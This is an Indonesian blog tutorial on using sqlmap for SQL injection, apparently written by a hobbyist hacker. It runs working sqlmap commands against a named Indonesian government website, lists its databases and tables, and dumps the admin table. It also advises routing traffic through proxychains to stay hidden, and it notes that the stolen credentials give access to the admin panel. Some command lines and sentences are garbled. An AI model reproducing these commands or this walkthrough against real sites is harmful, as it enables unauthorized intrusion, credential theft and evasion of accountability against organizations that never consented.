Ads by Google

Basic Hacking: Menggali Informasi Database Website Dengan SQLMAP


Basic Hacking: Menggali Informasi Database Website Dengan SQLMAP
Halo! Kembali ketemu dengan saya. Kali ini saya akan share hasil belajar saya mengeksplorasi vulne SQLi suatu web dengan bantuan Tool SQLMAP di Gene0s Linux saya.
Well. Langsung saja. Pertama-tama, kita kenalan dulu dengan SQLMAP. “Tak kenal maka tak paham”



sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band
Intinya, SQLMAP adalah tool dengan Command line interface yang membantu anda melihat, mengubah dan mengeksekusi perintah SQL.
Sudah jelas, kan? Selanjutnya instalasi SQLMAP dapat dilakukan dengan cara dibawah ini:Untuk live demo, saya sertakan link youtubUntuk live demo, saya sertakan link youtube dibawah ini.e dibawah ini.
1. Dengan GitClone
Code:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
2. Dengan Aptitude
Code:
~# apt-get install sqlmap
Cara ini mengharuskan Om Heiker untuk memasang repo Backtrack


Oh, iya. Saya ga make OS Jendela, jadi, kalau pake itu OS, tutornya nyari sendiri, ya
Setelah instalasi rampung, mari kita eksploitasi kemampuan tool satu ini :bigsmile:

Command dasar untuk menjalankan SQLMAP
Code:
root@razor0ut:/pentest/database/sqlmap# ./sqlmap.py -u "URL" --random-agent --threads X --banner --dbs --tables --columns --dump –dumpall
Keterangan? Coba jalanin perintah ini
Quote:
root@razor0ut:/pentest/database/sqlmap# ./sqlmap.py –hh :
Dengan perintah diatas, maka kita akan mendapatkan daftar perintah yang sangat hebat :
Well, dengan ini pembukaannya cukup. Anda dapat mempelajari sendiri. Just be persistent, Om Heker.
Sekarang kita mulai menggunakan tool ini untuk mengeksplorasi kelemahan SQL Injection pada suatu website. Saya contohkan satu website .go.id yang saya intip dari update Facebo’ok teman saya :
Here’s the complete URL
Code:
www.pemkomedan.go.id/en/gallery_detail.php?idx=’9
Vulne ini sudah lama terdeteksi, namun para Admin tidak mengubris report dari pentester. Tolong jangan ditiru Om Heker. Dan mari kita mulai aksi kita.
Mencari nama Database
Langkah ini digunakan untuk mengetahui database yang digunakan website target. Yarp, ga mungkin, lah. Informasi yang ingin kita gali bisa kita dapat kalau ga tau nama database-nya :
Code:
[Directories to sqlmap]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” --random-  --current-user -currrent-db
Hasilnya
Quote:
available databases [5]:
[*] *
[*] information_schema
[*] pemko_lelang
[*] pemko_medanmap
[*] pemko_pemko
[/code]

Hmmm. Setelah diliat dengan sepenuh hati, database pemko_pemko yang paling menarik. Mari kita bongkar isinya


FETCHING DATABASE PEMKO_PEMKO CONTENTS
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9”  --random-agent  -D pemko_pemko  --tables
Hasil dari command line diatas:
Quote:
Database: pemko_pemko
[62 tables]
+------------------------+
| admin |
| agenda |
| agenda_program |

Ada 62 tabel : tapi saya pilih yang isinya menarik : dan yang paling menarik adalah tabel “Admin” Sebelum basi, mari kita sikat tabel tersebut :
Here’s the command line you need
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” -random-agent  -D pemko_pemko -T admin –columns
Kalau ga sabaran, langsung aja dumping database tersebut :bigsmile:
Here’s the command line
Code:
[ Directories to sqlmap ]./sqlmap.py –u “www.pemkomedan.go.id/en/gallery_detail.php?idx=9” --random-agent -- -D ypt_v2 -T admin  –dump

Hasil dari command line diatas adalah



Tambahan!!!
Code:
- salah satu alternatif agar proses penggalian informasinya menjadi sedikit aman, disarankan untuk menggabungkan proxy tools yang bernama "proxychains" kedalam sqlmap. [default di mesin BT].
caranya :
root@bt:/pentest/database/sqlmap# proxychains python sqlmap.py <syntax selanjutnya>
Well, It’s done! Dengan username dan paswot tersebut, kita bisa masuk ke admin panel dan melakukan apapun! But I’d rather be wise and do nothing :

2 comments:

  1. ada tutorial perintah dasar sqlmap

    soalnya banyak
    ingin menggunakan bingung

    ReplyDelete
    Replies
    1. http://zonelinuxer.blogspot.com/2013/04/sqlmap-basic-usage.html
      monggo om

      Delete

Powered by Blogger.